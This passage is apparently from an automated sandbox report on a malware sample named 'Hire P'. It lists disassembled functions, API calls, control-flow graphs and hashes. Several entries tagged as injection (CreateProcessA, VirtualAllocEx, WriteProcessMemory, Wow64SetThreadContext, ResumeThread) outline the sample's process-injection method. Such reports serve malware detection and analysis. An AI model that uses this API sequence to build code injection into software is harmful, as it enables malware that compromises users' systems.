                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0880975E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            • Opcode ID: 9b2e72d6f6d371c54531504233f2aa1bbab375b3f771b3c707973e3908505f72
                                                            • Instruction ID: e5bb8185e47607898650377bacde526d10655a08cb663b698ab44f104dcf9e6e
                                                            • Opcode Fuzzy Hash: 9b2e72d6f6d371c54531504233f2aa1bbab375b3f771b3c707973e3908505f72
                                                            • Instruction Fuzzy Hash: 2A915771D00219CFDB60CFA9CC41BEEBBB2BB48315F1481A9E859E7281DB749985CF91
                                                            Function 0282B128 Relevance: 1.7, APIs: 1, Instructions: 199COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 3042 282b128-282b137 3043 282b163-282b167 3042->3043 3044 282b139-282b146 call 2829b98 3042->3044 3046 282b17b-282b1bc 3043->3046 3047 282b169-282b173 3043->3047 3050 282b148 3044->3050 3051 282b15c 3044->3051 3053 282b1c9-282b1d7 3046->3053 3054 282b1be-282b1c6 3046->3054 3047->3046 3099 282b14e call 282b3b0 3050->3099 3100 282b14e call 282b3c0 3050->3100 3051->3043 3055 282b1fb-282b1fd 3053->3055 3056 282b1d9-282b1de 3053->3056 3054->3053 3060 282b200-282b207 3055->3060 3058 282b1e0-282b1e7 call 282ade0 3056->3058 3059 282b1e9 3056->3059 3057 282b154-282b156 3057->3051 3061 282b298-282b316 3057->3061 3062 282b1eb-282b1f9 3058->3062 3059->3062 3064 282b214-282b21b 3060->3064 3065 282b209-282b211 3060->3065 3092 282b318-282b31b 3061->3092 3093 282b31c-282b358 3061->3093 3062->3060 3068 282b228-282b231 call 282adf0 3064->3068 3069 282b21d-282b225 3064->3069 3065->3064 3073 282b233-282b23b 3068->3073 3074 282b23e-282b243 3068->3074 3069->3068 3073->3074 3076 282b261-282b265 3074->3076 3077 282b245-282b24c 3074->3077 3101 282b268 call 282b690 3076->3101 3102 282b268 call 282b6c0 3076->3102 3077->3076 3078 282b24e-282b25e call 282ae00 call 282ae10 3077->3078 3078->3076 3081 282b26b-282b26e 3083 282b270-282b28e 3081->3083 3084 282b291-282b297 3081->3084 3083->3084 3092->3093 3094 282b360-282b38b GetModuleHandleW 3093->3094 3095 282b35a-282b35d 3093->3095 3096 282b394-282b3a8 3094->3096 3097 282b38d-282b393 3094->3097 3095->3094 3097->3096 3099->3057 3100->3057 3101->3081 3102->3081
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0282B37E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 069cbf457d84aa1eb4cfb602a3d9560f11c3a606ceb64b0d0516e2ed11dd88f2
                                                            • Instruction ID: 10d0fb34638155f95e9f9e8d60c14d5e9674331646592b26350b35edea18bbff
                                                            • Opcode Fuzzy Hash: 069cbf457d84aa1eb4cfb602a3d9560f11c3a606ceb64b0d0516e2ed11dd88f2
                                                            • Instruction Fuzzy Hash: E4716678A01B148FD724DF2AD15575ABBF1FF88308F00892DD48AD7A50D734E889CB91
                                                            Function 04F11110 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 3103 4f11110-4f11d56 3105 4f11d61-4f11d68 3103->3105 3106 4f11d58-4f11d5e 3103->3106 3107 4f11d73-4f11e12 CreateWindowExW 3105->3107 3108 4f11d6a-4f11d70 3105->3108 3106->3105 3110 4f11e14-4f11e1a 3107->3110 3111 4f11e1b-4f11e53 3107->3111 3108->3107 3110->3111 3115 4f11e60 3111->3115 3116 4f11e55-4f11e58 3111->3116 3117 4f11e61 3115->3117 3116->3115 3117->3117
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F11E02
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1527936836.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_4f10000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 6a293db00ce22d4bf92e58c09837ca9d1e8096ea99de940121596a836e851d95
                                                            • Instruction ID: 48a012ec047890df26bf40e119c27a11ccb82942cabe80d070c3d66ebcd3dcb4
                                                            • Opcode Fuzzy Hash: 6a293db00ce22d4bf92e58c09837ca9d1e8096ea99de940121596a836e851d95
                                                            • Instruction Fuzzy Hash: F851C2B1D00349DFDB14CF99C984ADEBBB5FF48314F24812AE919AB250D771A845CF91
                                                            Function 04F11CEF Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 3118 4f11cef-4f11d56 3119 4f11d61-4f11d68 3118->3119 3120 4f11d58-4f11d5e 3118->3120 3121 4f11d73-4f11dab 3119->3121 3122 4f11d6a-4f11d70 3119->3122 3120->3119 3123 4f11db3-4f11e12 CreateWindowExW 3121->3123 3122->3121 3124 4f11e14-4f11e1a 3123->3124 3125 4f11e1b-4f11e53 3123->3125 3124->3125 3129 4f11e60 3125->3129 3130 4f11e55-4f11e58 3125->3130 3131 4f11e61 3129->3131 3130->3129 3131->3131
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F11E02
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1527936836.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_4f10000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: 5c0d15646b26b1284263c3b83eb3c6c289884db0d2e01b43dbf6e180f8fab1c7
                                                            • Instruction ID: 94ed763dbbe6fcd80140c873ee5e88f986f5b453fede1bff25cd9287263023eb
                                                            • Opcode Fuzzy Hash: 5c0d15646b26b1284263c3b83eb3c6c289884db0d2e01b43dbf6e180f8fab1c7
                                                            • Instruction Fuzzy Hash: 4A41C0B1D00309DFDB14CF99C984ADEBFB5BF48314F24812AE819AB210D771A845CF91
                                                            Function 04F11264 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F14381
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1527936836.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_4f10000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            • Opcode ID: 3a0462da8587ecceb1794f41d6f3f11f91ec16277442b2e2567f1062b990d846
                                                            • Instruction ID: b322a4bd5d7cc2dd95ecdfd7f6a39de4392210a18bed9c591365849a86f2bb89
                                                            • Opcode Fuzzy Hash: 3a0462da8587ecceb1794f41d6f3f11f91ec16277442b2e2567f1062b990d846
                                                            • Instruction Fuzzy Hash: 674127B5A00309DFDB14CF99C458AAABBF5FB88314F24C459D519AB361D334A842CBA1
                                                            Function 028244F0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 028259C9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 2d61a8a3c2f495d964720773a04396bf62784d5e5b43a2b25a46e1ac5f871692
                                                            • Instruction ID: ba1e7e0db638f366e49887f9fc16d6fe4d8412e31886e0aee5c0297144dfea43
                                                            • Opcode Fuzzy Hash: 2d61a8a3c2f495d964720773a04396bf62784d5e5b43a2b25a46e1ac5f871692
                                                            • Instruction Fuzzy Hash: 3E41F2B4C0062DCBDB24DFA9C844B9EBBB5BF49304F60806AD409BB255DB756989CF90
                                                            Function 0282590D Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateActCtxA.KERNEL32(?), ref: 028259C9
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: Create
                                                            • String ID:
                                                            • API String ID: 2289755597-0
                                                            • Opcode ID: 2493bf62de7b160b6efac647ed539f31252142922ab6691bbba8b50a8631aaae
                                                            • Instruction ID: da6a84c4ae1b61ca3d919ff733b8cfab2f3be678427deb2faf5052b5881b0754
                                                            • Opcode Fuzzy Hash: 2493bf62de7b160b6efac647ed539f31252142922ab6691bbba8b50a8631aaae
                                                            • Instruction Fuzzy Hash: 0741D2B4C0062DCBDB18DFA9D98478DBBB6BF49304F60806AD409AB254DB756989CF90
                                                            Function 08808E62 Relevance: 1.6, APIs: 1, Instructions: 84injectionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08808EF8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: 3e9e21d1deccd31160e5e107ff55c36a69c3121a3814cc6330ba2547a6d3a7b8
                                                            • Instruction ID: 46053daf926cc02705ad1eb92a0143face0850ba5967765755a6ef4222d0d741
                                                            • Opcode Fuzzy Hash: 3e9e21d1deccd31160e5e107ff55c36a69c3121a3814cc6330ba2547a6d3a7b8
                                                            • Instruction Fuzzy Hash: C13168B5D002499FCB10CFADD845AEEBBF1FF88320F10842AE519A7241C7759955CFA4
                                                            Function 08808F52 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08808FD8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: ba92351a01e362276ff34583307e2a5b7c8643b08ebcfcdda4a26dd8ed0abfc5
                                                            • Instruction ID: 245ec1a069c4fb63aae1d9955152fa42447e08acdf16231cffa34658a656bc49
                                                            • Opcode Fuzzy Hash: ba92351a01e362276ff34583307e2a5b7c8643b08ebcfcdda4a26dd8ed0abfc5
                                                            • Instruction Fuzzy Hash: 2C3178B2D002499FCB10CFA9D881BEEFBB1FF48320F10842AE519A7281C7359555DFA1
                                                            Function 08808E68 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08808EF8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            • Opcode ID: d76545b1522deb5941a7d16d414c299420dc18dd37ebee19488f7c370ad0100e
                                                            • Instruction ID: c17929d79b6f7ddbe0d22a0ff757e9140894695e8c25b65f4f8463a9ff89edf2
                                                            • Opcode Fuzzy Hash: d76545b1522deb5941a7d16d414c299420dc18dd37ebee19488f7c370ad0100e
                                                            • Instruction Fuzzy Hash: C32155B19003499FCB10DFA9C981BEEBBF5FF48310F10842AE919A7240C7789944CFA4
                                                            Function 0282D600 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0282D5CE,?,?,?,?,?), ref: 0282D68F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: f71e4bf5f8c6113df28b11f274484602397d97c369d96f3e243d4aa69f35668d
                                                            • Instruction ID: 57ddd7a344e305d905d17aa35367a4dc1870c89ad4d79a48e4e9dba2c841d4af
                                                            • Opcode Fuzzy Hash: f71e4bf5f8c6113df28b11f274484602397d97c369d96f3e243d4aa69f35668d
                                                            • Instruction Fuzzy Hash: 4B2105B5D00218EFDB10DF9AD584ADEBFF4FB48310F14805AE918A3211D374A954CFA5
                                                            Function 08808CCA Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08808D4E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 3fd5d24fb9cbb3193503532953591479b7c68e755345aba05d0ea8cfd1e5ce6f
                                                            • Instruction ID: a86e0823784871e8be4502d0a7fe0a1cecb679ceb1f1a5c669038d3b04187ea6
                                                            • Opcode Fuzzy Hash: 3fd5d24fb9cbb3193503532953591479b7c68e755345aba05d0ea8cfd1e5ce6f
                                                            • Instruction Fuzzy Hash: 6E2159719003089FDB50DFAAC9857EEBBF4AF58324F14842AD519A7241C7789945CFA1
                                                            Function 0282B014 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0282D5CE,?,?,?,?,?), ref: 0282D68F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 6642e72f9d9b22eaa06b24c2bf04d29ac4b621b5da7f5cc978fcd1821255e475
                                                            • Instruction ID: 3f8e17d96535843a0d2f46e3873f362c6b867a87198074c8018c275895546467
                                                            • Opcode Fuzzy Hash: 6642e72f9d9b22eaa06b24c2bf04d29ac4b621b5da7f5cc978fcd1821255e475
                                                            • Instruction Fuzzy Hash: B92114B5900208AFDB10DFAAD984ADEBFF4FB48314F10805AE918B3350D374A954CFA5
                                                            Function 08808CD0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08808D4E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: a178c4279e718265cd791392d81066affeae654e2f1d4c57408d752980bc73fb
                                                            • Instruction ID: b6100f49a4125f6bfa8ac576e6fd4a9c63fb861dff527733da271bb94aa746a2
                                                            • Opcode Fuzzy Hash: a178c4279e718265cd791392d81066affeae654e2f1d4c57408d752980bc73fb
                                                            • Instruction Fuzzy Hash: 54213871D003098FDB50DFAAC8857EEBBF4AF58324F10842AD519A7241C7789945CFA5
                                                            Function 08808F58 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08808FD8
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            • Opcode ID: 6b02ecc1ced897fdefdff58f00cf44157e1e3e8483031fc5855602075d13a2a9
                                                            • Instruction ID: 2233eb40199ba5c7a8c7cbc3ebece04a5557e547bd5746318a01feb4c3ddb795
                                                            • Opcode Fuzzy Hash: 6b02ecc1ced897fdefdff58f00cf44157e1e3e8483031fc5855602075d13a2a9
                                                            • Instruction Fuzzy Hash: 142114B18002599FCB10DFAAC981AEEBBF5FF48310F10842AE519A7240C779A945CBA5
                                                            Function 0846E617 Relevance: 1.6, Strings: 1, Instructions: 308COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: 17615402bd9e22878a32bd22e740f1bde8a1c3e32e72f655e9172c4ff712cb5a
                                                            • Instruction ID: 6ffad15c4c95d128c22f4bee7813098dc63f0d1ed586999b53540e979dd14a98
                                                            • Opcode Fuzzy Hash: 17615402bd9e22878a32bd22e740f1bde8a1c3e32e72f655e9172c4ff712cb5a
                                                            • Instruction Fuzzy Hash: 57E19F78E00218CFDB50CFA9C980A9DBBF1FB49315F2491AAD818E7345D731A982CF51
                                                            Function 08808DA0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08808E16
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: cbd895d15f8d861be93d51299b810c40aa76f2acb895baa3bb7ffce7ce539929
                                                            • Instruction ID: beeec9560d0a0b88cd1fcdd2c2b036eba55b2956a68e4091db924f6664f209b7
                                                            • Opcode Fuzzy Hash: cbd895d15f8d861be93d51299b810c40aa76f2acb895baa3bb7ffce7ce539929
                                                            • Instruction Fuzzy Hash: 332156718002489FCB10DFAAC845BDFBFF5EF49320F148419E519AB250C776A954CFA1
                                                            Function 08808DA8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08808E16
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: a1426762f2db663aec0dad2d2aabbe0007998845f43621fedef3d36509c6ae61
                                                            • Instruction ID: 0a2e509a74fdef84101802990d0a472b2771122cc4e41a45b9af5052f3cffca4
                                                            • Opcode Fuzzy Hash: a1426762f2db663aec0dad2d2aabbe0007998845f43621fedef3d36509c6ae61
                                                            • Instruction Fuzzy Hash: F71149719002499FCB10DFAAC845ADFFFF5EF48320F108419E519A7250C775A954CFA1
                                                            Function 088087E0 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 4f17c3fcb003cb585f924fbecc0e552ef2c17044fca183aacbcccafcc0bdf4fc
                                                            • Instruction ID: 4ec03285e8d4c601d3ef44d03983231dbdfc66c932371f772a666f91aefee2ab
                                                            • Opcode Fuzzy Hash: 4f17c3fcb003cb585f924fbecc0e552ef2c17044fca183aacbcccafcc0bdf4fc
                                                            • Instruction Fuzzy Hash: 421176B1D002488FCB20DFAAC9457DEFFF9AB89324F248469C019A7240C779A944CFA5
                                                            Function 088087E8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 2d39229bc24767a44f9e9e7b03964a2fc5e32c83f51229d4c8ff60b118bbacc5
                                                            • Instruction ID: 2df9d90876566a7319ad06db3cb5928509ff3404959e4e32419905287714ac4d
                                                            • Opcode Fuzzy Hash: 2d39229bc24767a44f9e9e7b03964a2fc5e32c83f51229d4c8ff60b118bbacc5
                                                            • Instruction Fuzzy Hash: D51136B1D002488FCB20DFAAC8457DEFBF9AB88324F20842AD519A7240C775A944CFA5
                                                            Function 0282B318 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0282B37E
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1525462563.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_2820000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 6182bd722a4228dff341217498a79e1ac386bb6ed3ac732be0e99db1d883d6ea
                                                            • Instruction ID: 8a2a205dab748449b365ed6d982ad9d224b029d064a2a5d5024ad05fcc3cda2f
                                                            • Opcode Fuzzy Hash: 6182bd722a4228dff341217498a79e1ac386bb6ed3ac732be0e99db1d883d6ea
                                                            • Instruction Fuzzy Hash: 31110FB9C002498FCB10DF9AD548B9EFBF4AB88228F14845AD419A7210C379A549CFA5
                                                            Function 08805D58 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0880B90D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: 7252b4afbba065cf8b1697be6e0d997b0a3c53c5452e728fcdbd82e9005caf2c
                                                            • Instruction ID: e031a8ab3cf83fa59ff55b634dda5eaca47b5d31109ec88218fb013dcd019868
                                                            • Opcode Fuzzy Hash: 7252b4afbba065cf8b1697be6e0d997b0a3c53c5452e728fcdbd82e9005caf2c
                                                            • Instruction Fuzzy Hash: 6B11F2B580434C9FDB60DF9AD845BDEBBF8EB48324F108459E918A7240D375A944CFA5
                                                            Function 0880B8AA Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 0880B90D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528918537.0000000008800000.00000040.00000800.00020000.00000000.sdmp, Offset: 08800000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8800000_Hire P.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: e19a9069f53f3fe0234654f2d4150050ea0a75376dd1bf5c8833bbba860abf3b
                                                            • Instruction ID: d2f4bd3d8f1c0c4f7e8321a3936c521d89899b3abaef09d4140b16afb6f0663b
                                                            • Opcode Fuzzy Hash: e19a9069f53f3fe0234654f2d4150050ea0a75376dd1bf5c8833bbba860abf3b
                                                            • Instruction Fuzzy Hash: E31142B58003489FCB10DF9AD888BDEFFF8EB48320F10845AE518A7240D375A984CFA1
                                                            Function 08460CB0 Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Hcq
                                                            • API String ID: 0-419967981
                                                            • Opcode ID: 2d78305b79a8634173b68983ed6c28581b0adef39d79f37d3d4880a34f0aeb33
                                                            • Instruction ID: 875ac03fd01caf4eb4876461f9b3a8f406c89035a11f401e38a342634672b5ed
                                                            • Opcode Fuzzy Hash: 2d78305b79a8634173b68983ed6c28581b0adef39d79f37d3d4880a34f0aeb33
                                                            • Instruction Fuzzy Hash: 8481DC34B006148FDB14DB68C840AAFBBF6EF88311F1484AAE505EB3A1DB35ED05CB91
                                                            Function 0846D3D6 Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LR_q
                                                            • API String ID: 0-2241839734
                                                            • Opcode ID: 24a941009325f388a23bebdbf9820d02f01ce1a2237e4b9ac6a79de68d7a1177
                                                            • Instruction ID: e127503773b25a461d8bfa4ae1b8983ae5bbbb6a149b497a419213af989a077e
                                                            • Opcode Fuzzy Hash: 24a941009325f388a23bebdbf9820d02f01ce1a2237e4b9ac6a79de68d7a1177
                                                            • Instruction Fuzzy Hash: 1C91EB74E04208CFCB54DFA9D8806AEBBF1EF89324F24952AE819E7345D7319952CF41
                                                            Function 0846DA50 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1528670015.0000000008460000.00000040.00000800.00020000.00000000.sdmp, Offset: 08460000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_8460000_Hire P.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8cq
                                                            • API String ID: 0-304758316
                                                            • Opcode ID: cd00dc73d232e79cb36ad17457d83c8b445353322467dd9f7271d361f94c6d1f
                                                            • Instruction ID: 4c481a2ccaab533260755cdcea4fe5c3ff171f8ef54904f10234f5a25f5adf14
